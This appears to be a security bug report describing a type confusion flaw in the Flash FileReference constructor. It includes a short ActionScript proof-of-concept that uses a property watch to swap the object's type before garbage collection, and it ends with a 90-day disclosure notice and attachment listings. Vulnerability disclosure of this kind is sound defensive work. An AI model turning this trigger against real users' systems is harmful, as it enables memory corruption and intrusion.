There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.

A minimal PoC is as follows:

function myfunc(){
			
			this.__proto__ = {};
			this.__proto__.__constructor__ = flash.display.BitmapData;
			super(1000, 1000);
			
			
			}
			

	function mysubclass(){
		

		this.watch("name", myfunc);
		_global.ASnative(2204, 200)(this); // FileReference constructor
		this.unwatch("name"); // let the reference free
		
		}
	}

        var a = new subclass();
        a = 0;
        // wait for GC
	
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 

mysubclass.as 829 bytes View Download

myclass.as 448 bytes View Download

supertf.fla 4.8 KB Download

supertf.swf 1.0 KB Download